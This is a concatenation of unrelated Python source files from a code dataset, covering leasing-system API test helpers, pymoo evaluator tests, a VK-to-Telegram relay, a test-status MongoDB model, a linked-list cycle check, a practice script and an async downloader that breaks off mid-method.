\"rentRate\": None,\n \"bpFloatValue\": None,\n \"preditRentDate\": str(datetime.datetime.now().date()),\n \"financeTerm\": 12,\n \"yearPaymentTimes\": \"12\",\n \"totalPaymentTimes\": \"12\",\n \"financeTotalAmt\": 1000,\n \"totalBookAmt\": \"10000.00\",\n \"financingPaymentDirection\": \"Supplier\",\n \"financingPaymentDirectionName\": \"供应商\",\n \"isExistDownPayment\": 1,\n \"isExistDownPaymentName\": \"是\",\n \"downPaymentCalcMode\": \"FIX_AMOUNT\",\n \"downPaymentCalcModeName\": \"固定金额\",\n \"downPaymentRatio\": 0.9,\n \"downPaymentAmt\": 9000,\n \"downPaymentPayDirection\": \"OurCompany\",\n \"downPaymentPayDirectionName\": None,\n \"isExistMargin\": 0,\n \"isExistMarginName\": None,\n \"marginCalcMode\": None,\n \"marginCalcModeName\": None,\n \"marginRatio\": None,\n \"marginAmt\": None,\n \"marginDeductMode\": None,\n \"marginDeductModeName\": None,\n \"retentionPriceAmt\": \"100.00\",\n \"discountAmt\": None,\n \"firstTermAmt\": None,\n \"rentalMode\": \"Postpay\",\n \"rentalModeName\": None,\n \"rentCalcMode\": \"EquivalentRent\",\n \"rentCalcModeName\": None,\n \"rentAmt\": \"100\",\n \"quickPaymentAmt\": None,\n \"rentTotalAmt\": None,\n \"interestTotalAmt\": None,\n \"recoveryPrincipalTotalAmt\": None,\n \"incomeTotalAmt\": None,\n \"xirrRate\": None,\n \"xirrPureRate\": None,\n \"irrRate\": None,\n \"irrPureRate\": None,\n \"financeSegmentList\": [],\n \"repayScheduleList\": []\n }\n res = self.api(method='POST', url=url, json=data)\n return res\n\n # def rentCalc(self,projectNo,projTradesId,id):\n # '''租金测算'''\n # url = 'ifc/api/credit-apply/trades/rentCalc'\n # data = {\n # \"projectNo\": projectNo,\n # \"projTradesId\": projTradesId,\n # \"id\": id,\n # \"rateAppearMode\": \"Implication\",\n # \"lprBaseRate\": None,\n # \"rentRate\": None,\n # \"bpFloatValue\": None,\n # \"preditRentDate\": datetime.datetime.now().date(),\n # \"financeTerm\": 12,\n # \"yearPaymentTimes\": \"12\",\n # \"totalPaymentTimes\": \"12\",\n # \"financeTotalAmt\": \"1000.00\",\n # \"totalBookAmt\": 10000,\n # \"financingPaymentDirection\": \"Supplier\",\n # \"financingPaymentDirectionName\": \"供应商\",\n # \"isExistDownPayment\": 1,\n # \"downPaymentCalcMode\": \"FIX_AMOUNT\",\n # \"downPaymentRatio\": 0.9,\n # \"downPaymentAmt\": 9000,\n # \"downPaymentPayDirection\": \"Supplier\",\n # \"isExistMargin\": 0,\n # \"isExistMarginName\": None,\n # \"marginCalcMode\": None,\n # \"marginRatio\": None,\n # \"marginAmt\": None,\n # \"marginDeductMode\": None,\n # \"retentionPriceAmt\": \"100.00\",\n # \"discountAmt\": None,\n # \"firstTermAmt\": None,\n # \"rentalMode\": \"Prepay\",\n # \"rentalModeName\": None,\n # \"rentCalcMode\": 
\"EquivalentRent\",\n # \"rentAmt\": \"100\",\n # \"quickPaymentAmt\": None,\n # \"rentTotalAmt\": None,\n # \"interestTotalAmt\": None,\n # \"recoveryPrincipalTotalAmt\": None,\n # \"incomeTotalAmt\": None,\n # \"xirrRate\": None,\n # \"xirrPureRate\": None,\n # \"irrRate\": None,\n # \"irrPureRate\": None,\n # \"financeSegmentList\": [],\n # \"repayScheduleList\": []\n # }\n # res = self.api(method='POST', url=url, json=data)\n # return res\n\n '''融资信息'''\n def rentSave(self,projectNo,projTradesId):\n res = self.financeQuery(projectNo,projTradesId)\n id = jsonpath.jsonpath(res,'$..id')[0]\n self.rentCalc(projectNo,projTradesId,id)\n url = 'ifc/api/credit-apply/trades/rentSave'\n data = {\n \"projectNo\": projectNo,\n \"projTradesId\": projTradesId,\n \"id\": id,\n \"rateAppearMode\": \"Implication\",\n \"lprBaseRate\": \"3.65\",\n \"rentRate\": 0.4204,\n \"bpFloatValue\": \"3,838.61\",\n \"preditRentDate\": str(datetime.datetime.now().date()),\n \"financeTerm\": 12,\n \"yearPaymentTimes\": \"12\",\n \"totalPaymentTimes\": \"12\",\n \"financeTotalAmt\": \"1000.00\",\n \"totalBookAmt\": 10000,\n \"financingPaymentDirection\": \"Supplier\",\n \"financingPaymentDirectionName\": \"供应商\",\n \"isExistDownPayment\": 1,\n \"downPaymentCalcMode\": \"FIX_AMOUNT\",\n \"downPaymentRatio\": 0.9,\n \"downPaymentAmt\": 9000,\n \"downPaymentPayDirection\": \"Supplier\",\n \"isExistMargin\": 0,\n \"isExistMarginName\": None,\n \"marginCalcMode\": None,\n \"marginRatio\": None,\n \"marginAmt\": None,\n \"marginDeductMode\": None,\n \"retentionPriceAmt\": \"100.00\",\n \"discountAmt\": None,\n \"firstTermAmt\": None,\n \"rentalMode\": \"Prepay\",\n \"rentalModeName\": None,\n \"rentCalcMode\": \"EquivalentRent\",\n \"rentAmt\": \"100.00\",\n \"quickPaymentAmt\": None,\n \"rentTotalAmt\": None,\n \"interestTotalAmt\": None,\n \"recoveryPrincipalTotalAmt\": None,\n \"incomeTotalAmt\": None,\n \"xirrRate\": None,\n \"xirrPureRate\": None,\n \"irrRate\": None,\n \"irrPureRate\": None,\n \"financeSegmentList\": [],\n \"repayScheduleList\": []\n }\n res = self.api(method='POST', url=url, json=data)\n\n '''评估主体类型'''\n def evaluationSubjectQuery(self,projectNo):\n url = 'ifc/api/risk-info/queryEvaluationSubjectBase'\n data = {\n \"projectNo\": projectNo,\n \"roleType\": \"1\"\n }\n res = self.api(method='POST', url=url, json=data)\n return res\n\n def evaluationSubjectScoreQuery(self,projectNo):\n '''评估主体得分'''\n res_subject = self.evaluationSubjectQuery(projectNo)\n url = 'ifc/api/risk-info/queryEvaluationSubjectScore'\n data = {\n \"projectNo\": projectNo,\n \"evaluationSubjectId\": jsonpath.jsonpath(res_subject,'$..evaluationSubjectId')[0],\n \"evaluationSubjectType\": \"1\"\n }\n res_score = self.api(method='POST', url=url, json=data)\n return res_subject,res_score\n\n '''评估主体保存'''\n def evaluationSubjectSave(self,projectNo):\n res = self.evaluationSubjectScoreQuery(projectNo)\n url = 'ifc/api/risk-info/saveEvaluationSubject'\n data = {\n \"id\": None,\n \"projectNo\": projectNo,\n \"evaluationSubjectId\": jsonpath.jsonpath(res[0],'$..evaluationSubjectId')[0],\n \"evaluationSubjectType\": \"1\",\n \"evaluationSubjectTypeName\": None,\n \"evaluationSubjectName\": None,\n \"generalScore\": None,\n \"scheme\": None,\n \"riskScoreItemMap\": {\n \"depositGt5timesRent6Mon\": 0,\n \"houseProperty\": 0,\n \"loansAndConsume6mGe3\": 0,\n \"businessTeam60AndOverdueRateOver2Percent\": 0,\n \"personDishonestExecutee\": 0\n },\n \"scoreConfigList\": [{\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": 
\"houseProperty\",\n \"scoreItemName\": \"房产(单价超1万,且净值覆盖敞口)\",\n \"elementValue\": \"是\",\n \"ratingScore\": 1\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"houseProperty\",\n \"scoreItemName\": \"房产(单价超1万,且净值覆盖敞口)\",\n \"elementValue\": \"否\",\n \"ratingScore\": 0\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"depositGt5timesRent6Mon\",\n \"scoreItemName\": \"近6个月内日均存款余额大于最高租金5倍\",\n \"elementValue\": \"是\",\n \"ratingScore\": 1\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"depositGt5timesRent6Mon\",\n \"scoreItemName\": \"近6个月内日均存款余额大于最高租金5倍\",\n \"elementValue\": \"否\",\n \"ratingScore\": 0\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"personDishonestExecutee\",\n \"scoreItemName\": \"当前未决诉讼达20万或2年内曾失信限高等\",\n \"elementValue\": \"是\",\n \"ratingScore\": -1\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"personDishonestExecutee\",\n \"scoreItemName\": \"当前未决诉讼达20万或2年内曾失信限高等\",\n \"elementValue\": \"否\",\n \"ratingScore\": 0\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"loansAndConsume6mGe3\",\n \"scoreItemName\": \"近六个月小贷、消费类金融查询超3次(含)\",\n \"elementValue\": \"是\",\n \"ratingScore\": -1\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"loansAndConsume6mGe3\",\n \"scoreItemName\": \"近六个月小贷、消费类金融查询超3次(含)\",\n \"elementValue\": \"否\",\n \"ratingScore\": 0\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"businessTeam60AndOverdueRateOver2Percent\",\n \"scoreItemName\": \"业务团队60+逾期率超2%\",\n \"elementValue\": \"是\",\n \"ratingScore\": -2\n }, {\n \"id\": None,\n \"projectNo\": None,\n \"scoreItemCode\": \"businessTeam60AndOverdueRateOver2Percent\",\n \"scoreItemName\": \"业务团队60+逾期率超2%\",\n \"elementValue\": \"否\",\n \"ratingScore\": 0\n }],\n \"scoreItemVMList\": jsonpath.jsonpath(res[1],'$..scoreItemVMList')[0]\n }\n res = self.api(method='POST', url=url, json=data)\n\n '''授信要素查询'''\n def creditElementQuery(self,projectNo):\n url = 'ifc/api/risk-info/queryCreditElement'\n data = {\n \"projectNo\": projectNo\n }\n res = self.api(method='POST', url=url, json=data)\n return res\n\n '''授信归属公司查询'''\n def queryEnterpriseByproject(self,projectNo):\n url = 'ifc/api/proj_cust_enterprise_related_info/queryEnterpriseByProjectNoAndRoleType'\n data = {\n \"projectNo\": projectNo\n }\n res = self.api(method='POST', url=url, json=data)\n return res\n\n '''授信要素'''\n def creditElementSave(self,projectNo):\n res = self.queryEnterpriseByproject(projectNo)\n url = 'ifc/api/risk-info/saveCreditElement'\n data ={\n \"projectNo\": projectNo,\n \"custRelatedList\": [],\n \"shareholderStructureList\": [],\n \"projCustEnterpriseIncomeVerification\": {\n \"id\": None,\n \"confirmableIncome\": \"10\",\n \"currentYearIncome\": \"10.00\",\n \"previousYearIncome\": \"10.00\",\n \"projectNo\": None\n },\n \"bankStatementList\": [],\n \"electricChargeList\": [{\n \"billDate\": \"2023-08\",\n \"billAmount\": \"10.00\"\n }, {\n \"billDate\": \"2023-07\",\n \"billAmount\": \"10.00\"\n }, {\n \"billDate\": \"2023-06\",\n \"billAmount\": \"10.00\"\n }, {\n \"billDate\": \"2023-05\",\n \"billAmount\": \"10.00\"\n }, {\n \"billDate\": \"2023-04\",\n \"billAmount\": \"10.00\"\n }, {\n \"billDate\": \"2023-03\",\n \"billAmount\": \"10.00\"\n }],\n \"rigidLiabilityList\": [{\n \"customerType\": \"1\",\n \"liabilityType\": \"BankLoan\",\n \"belongingCompanyId\": jsonpath.jsonpath(res,'$..id')[0],\n \"rigidLiabilityAmount\": \"100.00\",\n \"mortgageLiabilityAmount\": 
\"100.00\"\n }],\n \"totalAmount\": 800,\n \"recentElecDate\": \"2023-08\"\n }\n res = self.api(method='POST', url=url, json=data)\n\n '''准入要求'''\n def accessRquirementSave(self,projectNo):\n url = 'ifc/api/risk-info/saveAccessRequirement'\n data = {\n \"projectNo\": projectNo,\n \"list\": [{\n \"accessItemCode\": \"\",\n \"arSubTypeName\": \"其他\",\n \"arDesc\": \"其他\",\n \"comment\": \"其他备注\",\n \"projectNo\": projectNo,\n \"arCode\": \"ar6\",\n \"arSubCode\": \"arSub16\"\n }]\n }\n res = self.api(method='POST', url=url, json=data)\n\n '''影像信息'''\n def attachmentSave(self,projectNo,fileId,fileName,subCategoryCode):\n url = 'ifc/api/attachment/saveFileRelation'\n data = {\n \"fileId\": fileId,\n \"fileName\": fileName,\n \"subCategoryCode\": subCategoryCode,\n \"isUpdate\": False,\n \"code\": \"projectCreditApproval\",\n \"businessKey\": projectNo,\n \"businessType\": \"PROJECT\"\n }\n res = self.api(method='POST', url=url, json=data)\n\n '''影像信息下一步校验'''\n def attachmentNextStep(self,projectNo):\n url = 'ifc/api/attachment/nextStep'\n data = {\n \"businessKey\": projectNo,\n \"templateCode\": \"projectCreditApproval\"\n }\n res = self.api(method='POST', url=url, json=data)\n\n '''补充资料'''\n def reqTextSave(self,projectNo):\n url = 'ifc/api/risk-info/saveReqTextItem'\n data = {\n \"partnerInfoList\": [],\n \"workshopType\": \"1\",\n \"isExistEstate\": 0,\n \"estateInfoCommand\": {\n \"estateNum\": \"\",\n \"isExistMortgage\": 1,\n \"marketValueApprox\": \"\",\n \"netValue\": \"\",\n \"estateBelonger\": \"\"\n },\n \"workshopInfoVm\": {\n \"landArea\": \"100\",\n \"floorArea\": \"100\",\n \"marketValueApprox\": \"100\",\n \"leaseTerm\": \"\",\n \"yearlyRental\": \"\"\n },\n \"entIncomeScaleApprox\": \"100\",\n \"entIncomeScaleApproxLy\": \"100\",\n \"fluctuationCause\": \"说明原因\",\n \"equipmentName\": \"设备名称\",\n \"equipmentTotal\": \"10\",\n \"stageEquipmentTotal\": \"10\",\n \"projAdvantage\": \"项目优势\",\n \"projDisadvantage\": \"项目劣势\",\n \"abnormalSlowReleaseCondition\": \"缓释条件\",\n \"supplementaryContent\": \"其他补充\",\n \"projectNo\": projectNo\n }\n res = self.api(method='POST', url=url, json=data)\n\n def detectorExec(self,itemCode,taskid,detectorCode):\n url = 'ifc/api/common/detector/exec'\n data = {\n \"detectorCode\": detectorCode,\n \"itemCode\": itemCode,\n \"taskId\": taskid\n }\n res = self.api(method='POST', url=url, json=data)\n\n def todoListApp(self):\n '''审批列表'''\n url = 'bpm/api/v2/cmapp-filter/mytask/todo-list?channel=appstore&os=ios&page=0&size=20&timeString=1692588472.32&version=1.1.4'\n res = self.api(method='GET', url=url)\n return res\n\n def todoListPc(self):\n url = 'bpm/api/v2/mytask/todo-list?page=0&size=50&sort='\n res = self.api(method='GET', url=url)\n return res\n\n def getPcTask(self,projectNo):\n res = self.todoListPc()\n for i in res[\"content\"]:\n if i[\"businessKey\"] == projectNo:\n taskid = i[\"id\"]\n break;\n return taskid\n\n def completeInit(self,taskId):\n url = 'ifc/api/flow/task-complete/init?taskId=%s'%taskId\n res = self.api(method='GET', url=url)\n return res\n\n def result(self,start_time,projectNo):\n end_time = time.time()\n run_time = round(end_time - start_time, 2)\n result = {\n \"code\": 200,\n \"status\": True,\n \"message\": 'success,耗时%ss,打开app项目列表查看新建项目!!!' 
% run_time,\n \"data\": \"项目编号:%s\" % projectNo\n }\n return result\n","repo_name":"jixiaowei1030/jixiaowei","sub_path":"leaseYXZ500/Z500/tools/xiaoWeiNew.py","file_name":"xiaoWeiNew.py","file_ext":"py","file_size_in_byte":76244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9357026440","text":"import unittest\n\nimport numpy as np\n\nfrom pymoo.factory import get_problem\nfrom pymoo.model.evaluator import Evaluator\nfrom pymoo.model.individual import Individual\nfrom pymoo.model.population import Population\n\nproblem = get_problem(\"Rastrigin\")\n\nX = np.random.random((100, problem.n_var))\n\nF = problem.evaluate(X, return_values_of=[\"F\"])\n\nclass EvaluatorTest(unittest.TestCase):\n\n def test_evaluate_array(self):\n evaluator = Evaluator(evaluate_values_of=[\"F\", \"CV\"])\n _F, _CV = evaluator.eval(problem, X)\n np.testing.assert_allclose(F, _F)\n self.assertTrue(evaluator.n_eval == len(X))\n\n def test_evaluate_array_single(self):\n evaluator = Evaluator(evaluate_values_of=[\"F\", \"CV\"])\n _F, _CV = evaluator.eval(problem, X[0])\n np.testing.assert_allclose(F[0], _F)\n self.assertTrue(evaluator.n_eval == 1)\n\n def test_evaluate_individual(self):\n evaluator = Evaluator()\n ind = evaluator.eval(problem, Individual(X=X[0]))\n np.testing.assert_allclose(F[0], ind.get(\"F\"))\n self.assertTrue(evaluator.n_eval == 1)\n\n def test_evaluate_pop(self):\n evaluator = Evaluator()\n pop = Population().new(\"X\", X)\n evaluator.eval(problem, pop)\n np.testing.assert_allclose(F, pop.get(\"F\"))\n self.assertTrue(evaluator.n_eval == len(X))\n\n def test_preevaluated(self):\n evaluator = Evaluator()\n pop = Population().new(\"X\", X)\n evaluator.eval(problem, pop)\n\n pop[range(30)].set(\"F\", None)\n\n evaluator = Evaluator()\n evaluator.eval(problem, pop)\n\n np.testing.assert_allclose(F, pop.get(\"F\"))\n self.assertTrue(evaluator.n_eval == 30)\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"AIasd/ADFuzz","sub_path":"pymoo/tests/problems/test_evaluator.py","file_name":"test_evaluator.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"37643810207","text":"import time\nfrom telebot.util import smart_split\n\n\nclass Queue:\n in_vk_peer_id = None\n out_tg_chat_id = None\n tg = None\n\n def __init__(self, in_vk_peer_id, out_tg_chat_id, tg):\n self.in_vk_peer_id = in_vk_peer_id\n self.out_tg_chat_id = out_tg_chat_id\n self.tg = tg\n\n def on_in_message(self, event):\n if event.peer_id != self.in_vk_peer_id:\n return\n\n text = event._process_message(event)\n\n # sometimes telegram fails, so try until successful\n while True:\n try:\n for x in smart_split(text):\n self.tg.send_message(chat_id=self.out_tg_chat_id, text=x)\n break\n except Exception as e:\n print(\"tg send_message exception:\")\n print(e)\n time.sleep(5)\n continue\n\n # log separator between events\n print()\n","repo_name":"UnkwUsr/vk-tg-suckling-user-bot","sub_path":"msg_queue.py","file_name":"msg_queue.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36131570282","text":"import datetime\nimport bson\n\nfrom . 
import Base\nfrom .Test import Test\nfrom .TestType import TestType\nfrom .Index import Index\nfrom .CoreObject import CoreObject\n\n\nSTATUSES = ['SUCCESS', 'FAILURE', 'UNKNOWN', 'CUSTOM', 'DEPRECATED']\n\n\nclass Status(CoreObject):\n collection = 'status'\n _test_id = 'test_id'\n _type = 'type'\n _on = 'on'\n _status = 'status'\n _details = 'details'\n _last = 'last'\n _id = '_id'\n\n\n def __init__(self, test_id=None, test_type=None, status=None, on=None, # pylint: disable=too-many-arguments\n details=None, last=None, base_id=None):\n super(Status, self).__init__()\n self._test_id = test_id\n self._type = test_type\n self._on = on\n self._status = status\n self._details = details\n self._last = last\n self._id = base_id\n\n def __repr__(self):\n return '<Status test_id: {0}, type: {1}, status: {2}, on: {3}>'\\\n .format(self._test_id, self._type, self._status, self._on)\n\n def to_dict(self):\n dict_of_self = super(Status, self).to_dict()\n if self._on is not None:\n dict_of_self[Status._on] = self._on.replace(microsecond=0)\n return dict_of_self\n\n @classmethod\n def from_dict(cls, status_dict):\n status = super(Status, cls).from_dict(status_dict)\n if Status._id in status_dict:\n status._id = str(status_dict[Status._id])\n return status\n\n @staticmethod\n def list(query_filter=None, sort=None, page=None, nb_item=None):\n return Status.get_all(query_filter, sort, page, nb_item)\n\n def save(self):\n Test(test_id=self._test_id, test_type=self._type).save()\n TestType.from_status(self).save()\n Index.index(self)\n self._on = datetime.datetime.now()\n if self._status not in STATUSES:\n if self._details is None:\n self._details = {}\n if 'original_status' not in self._details:\n self._details['original_status'] = self._status\n self._status = 'CUSTOM'\n self._id = str(Base.Base().insert(self.collection, self.to_dict()))\n\n def get_last(self):\n Test(test_id=self._test_id).save()\n query_filter = self.to_dict()\n query_filter[Status._last] = True\n res = Base.Base().get_one(self.collection, query_filter)\n return Status.from_dict(res) if res is not None else None\n\n def get(self):\n query_filter = self.to_dict()\n res = Base.Base().get_one(self.collection, query_filter)\n return Status.from_dict(res) if res is not None else None\n\n def update_last(self):\n Base.Base().update(self.collection, {Status._test_id: self._test_id, Status._last: True},\n {Status._last: False})\n\n def save_and_update(self):\n self.update_last()\n self._last = True\n self.save()\n\n def remove(self):\n Base.Base().remove_by_id(self.collection, bson.ObjectId(self._id))\n\n def should_i_run(self, run_type='default'):\n test_type = TestType.get_one(TestType.from_status(self).to_dict())\n run = test_type.run(run_type)\n if run is None:\n return None\n condition = run['condition']\n modifier = run['modifier']\n status_list = Status.list({Status._test_id: self._test_id})\n status_list_filtered = condition.check_statuses(status_list)\n if modifier == 'ANY':\n return len(status_list_filtered) != 0\n if modifier == 'ALL':\n return len(status_list_filtered) == len(status_list)\n\n def purge(self):\n test_type = TestType.get_one(TestType.from_status(self).to_dict())\n if test_type is None:\n return {'nb_removed': 0}\n run = test_type.purge()\n condition = run['condition']\n action = run['action']\n status_list = Status.list({Status._test_id: self._test_id})\n status_list_filtered = condition.check_statuses(status_list)\n if action == 'REMOVE':\n for status in status_list_filtered:\n status.remove()\n return {'nb_removed': len(status_list_filtered)}\n\n def 
add_unknown_if_none_exist(self):\n last = self.get_last()\n if last is None:\n self._last = True\n self._status = 'UNKNOWN'\n self._on = datetime.datetime.now()\n self._id = str(Base.Base().insert(self.collection, self.to_dict()))\n","repo_name":"mockersf/TestSheriff","sub_path":"TestSheriff/core/Status.py","file_name":"Status.py","file_ext":"py","file_size_in_byte":4435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3511231418","text":"# Given head, the head of a linked list, determine if the linked list has a cycle in it.\n\nclass Solution:\n def hasCycle(self, head: Optional[ListNode]) -> bool:\n if head is None:\n return False\n \n slow = head \n fast = head.next\n \n while fast != slow:\n if fast is None or fast.next is None:\n return False\n slow = slow.next \n fast = fast.next.next\n \n return True","repo_name":"Annaliskirwa/_Linked_Lists","sub_path":"LinkedListCycle.py","file_name":"LinkedListCycle.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20735505821","text":"# input_x = input(\"Nhap du lieu: \")\n# print(f\"gia tri vua nhap:{input_x}\")\n\nprint(\"yahoo!\" if 3 > 4 else \"shit!\")\n\nli = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nli.append(\"a\")\nli.append(\"b\")\nprint(li)\nli.pop(1)\ndel li[1]\nli.remove(\"a\")\nli2 = li[:]\nli.insert(1, 34)\nli = li + li2\nprint(li)\nprint(len(li))\nt = (1, 2, 3, \"a\")\n\na, b, c = (1, 2, 3)\na=2\nprint(a)\n# kieu du lieu tu dien\n\ndic ={\"one\":1,\"two\":2,\"three\":3}\n\n\ndic.setdefault(\"five\",5)\ndic.update({\"four\":4})\nprint(dic.values())\ndic.setdefault(\"five\",6)\ndic[\"seven\"]=7\ndel dic[\"one\"]\nprint(dic)\n\n# kieu tap hop set\nse = {1,1,2,2,3,4}\n\nse2 = {2,3,4,5}\nprint(se | se2)\nprint(se-se2)\nprint(se^se2)\nprint(se>=se2)\nprint(2 in se)\n\n# LUONG DIEU KHIEN VA KIEU KHA LAP\n\nx_dic = dic.keys()\n#for i in x_dic:\n# print(i),","repo_name":"tiepnv281/HelloWorld","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28507249375","text":"import asyncio\nimport concurrent.futures\nimport datetime\nimport logging\nimport os\nimport random\nfrom typing import Callable, Union\n\nimport async_files\nimport httpcore\nimport httpx\nimport humanize\n\nimport aiodown\nfrom aiodown.errors import FinishedError, PausedError, ProgressError\n\nlog = logging.getLogger(__name__)\n\n\nclass Download:\n def __init__(\n self,\n url: str,\n path: str = None,\n retries: int = 3,\n client: \"aiodown.Client\" = None,\n workers: int = 8,\n ):\n self._client = client\n self._workers = workers\n\n self._id = random.randint(1, 9999)\n self._url = url\n self._path = os.path.dirname(path) if path else None\n self._name = os.path.basename(path) if path else os.path.basename(url)\n self._start = 0\n self._status = \"ready\"\n self._retries = retries\n self._attempts = 0\n self._bytes_total = 0\n self._bytes_downloaded = 0\n\n self._loop = asyncio.get_event_loop()\n self._task = asyncio.ensure_future(self._request())\n\n async def _request(self):\n \"\"\"This is where the magic happens, everything is downloaded here.\n\n Raises:\n FileExistsError: In case the download location already exists.\n \"\"\"\n\n if self.get_status() in [\"reconnecting\", \"started\"]:\n if not self._path:\n self._path = f\"./downloads/{random.randint(1000, 9999)}\"\n\n if 
not os.path.exists(self._path):\n os.makedirs(self._path)\n\n path = os.path.join(self._path, self._name)\n if not self.get_status() == \"reconnecting\":\n if os.path.exists(path):\n raise FileExistsError(f\"[Errno 17] File exists: '{path}'\")\n self._status = \"downloading\"\n\n try:\n async with httpx.AsyncClient(\n http2=True, follow_redirects=True\n ) as client:\n async with client.stream(\"GET\", self._url) as response:\n assert response.status_code == 200\n\n self._bytes_total = int(response.headers[\"Content-Length\"])\n\n async with async_files.FileIO(path, \"wb\") as file:\n async for chunk in response.aiter_bytes():\n if self.get_status() == \"stopped\":\n break\n if self.get_status() == \"paused\":\n while self.get_status() == \"paused\":\n await asyncio.sleep(0.1)\n continue\n\n bytes_downloaded = response.num_bytes_downloaded\n if self.get_status() == \"reconnecting\":\n if bytes_downloaded < self.get_size_downloaded():\n continue\n else:\n self._attempts = 0\n self._status = \"downloading\"\n\n if bytes_downloaded > 0:\n await file.write(chunk)\n self._bytes_downloaded = bytes_downloaded\n\n if not self.get_status() == \"stopped\":\n self._status = \"finished\"\n log.info(f\"{self.get_file_name()} finished!\")\n if self._client is not None:\n self._client.check_is_running()\n await file.close()\n await client.aclose()\n except (\n AssertionError,\n httpx.CloseError,\n httpcore.ConnectError,\n httpx.ConnectError,\n httpx.RemoteProtocolError,\n KeyError,\n ):\n log.info(f\"{self.get_file_name()} connection failed!\")\n self._status = \"reconnecting\"\n log.info(f\"{self.get_file_name()} retrying!\")\n if self.get_attempts() < self.get_retries():\n await asyncio.sleep(3)\n self._attempts += 1\n await self._request()\n else:\n self._status = \"failed\"\n log.info(\n f\"{self.get_file_name()} reached the limit of {self.get_retries()} attempts!\"\n )\n except BaseException:\n self._status = \"failed\"\n log.info(f\"{self.get_file_name()} failed!\")\n if self._client is not None:\n self._client.check_is_running()\n\n async def start(self):\n \"\"\"Starts the download if it has not already been.\n\n Raises:\n RuntimeError: If the download has already started.\n :obj:`aiodown.errors.ProgressError`: If the download is in progress.\n \"\"\"\n\n if self.get_status() == \"started\":\n raise RuntimeError(\"Download is already started\")\n if not self.is_finished():\n raise ProgressError()\n\n self._status = \"started\"\n self._start = datetime.datetime.now()\n pool = concurrent.futures.ThreadPoolExecutor(max_workers=self._workers)\n future = self._loop.run_in_executor(pool, self._task, self.get_id())\n await asyncio.gather(future, return_exceptions=True)\n\n log.info(f\"{self.get_file_name()} started!\")\n\n async def stop(self):\n \"\"\"Stop download if started.\n\n Raises:\n :obj:`aiodown.errors.FinishedError`: In case the download has already been completed.\n RuntimeError: If the download has already stopped.\n \"\"\"\n\n if self.is_finished():\n raise FinishedError()\n if self.get_status() == \"stopped\":\n raise RuntimeError(\"Download is already stopped\")\n\n self._status = \"stopped\"\n if not self._task.cancelled():\n self._task.cancel()\n if self._client is not None:\n self._client.check_is_running()\n\n log.info(f\"{self.get_file_name()} stopped!\")\n\n async def pause(self):\n \"\"\"Pauses the download if it is in progress.\n\n Raises:\n :obj:`aiodown.errors.FinishedError`: In case the download has already been completed.\n :obj:`aiodown.errors.PausedError`: In case the 
download is already paused.\n \"\"\"\n\n if self.is_finished():\n raise FinishedError()\n if self.get_status() == \"paused\":\n raise PausedError()\n\n self._status = \"paused\"\n\n log.info(f\"{self.get_file_name()} paused!\")\n\n async def resume(self):\n \"\"\"Resume download if paused.\n\n Raises:\n :obj:`aiodown.errors.FinishedError`: In case the download has already been completed.\n :obj:`aiodown.errors.ProgressError`: In case download is not paused.\n \"\"\"\n\n if self.is_finished():\n raise FinishedError()\n if self.get_status() != \"paused\":\n raise ProgressError()\n\n self._status = \"downloading\"\n\n log.info(f\"{self.get_file_name()} resumed!\")\n\n def get_size_total(\n self, human: bool = False, binary: bool = False, gnu: bool = False\n ) -> Union[int, str]:\n \"\"\"Get the total number of bytes.\n\n Parameters:\n human (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding,\n if False, it will return only the bytes in numbers.\n\n binary (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding in binary mode,\n if False, it will return only in human understanding format.\n ``human`` required.\n\n gnu (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding in gnu mode,\n if False, it will return only in human understanding format.\n ``human`` required.\n\n Raises:\n TypeError: In case of using binary or gnu mode without human mode.\n TypeError: If you try to use binary and gnu mode at the same time.\n\n Returns:\n ``int``: If human mode is disabled.\n ``str``: If human mode is enabled.\n \"\"\"\n\n size = self._bytes_total\n\n return self._human_binary(binary, gnu, human, size)\n\n def get_size_downloaded(\n self, human: bool = False, binary: bool = False, gnu: bool = False\n ) -> Union[int, str]:\n \"\"\"Get the downloaded number of bytes.\n\n Parameters:\n human (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding,\n if False, it will return only the bytes in numbers.\n\n binary (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding in binary mode,\n if False, it will return only in human understanding format.\n ``human`` required.\n\n gnu (``bool``, *optional*):\n If True, it will return the bytes in a format for human understanding in gnu mode,\n if False, it will return only in human understanding format.\n ``human`` required.\n\n Raises:\n TypeError: In case of using binary or gnu mode without human mode.\n TypeError: If you try to use binary and gnu mode at the same time.\n\n Returns:\n ``int``: If human mode is disabled.\n ``str``: If human mode is enabled.\n \"\"\"\n\n size = self._bytes_downloaded\n\n return self._human_binary(binary, gnu, human, size)\n\n def get_progress(self) -> float:\n \"\"\"Get the current progress.\n\n Returns:\n ``float``: The current progress of the download.\n \"\"\"\n\n try:\n progress = float(\n f\"{self.get_size_downloaded() / 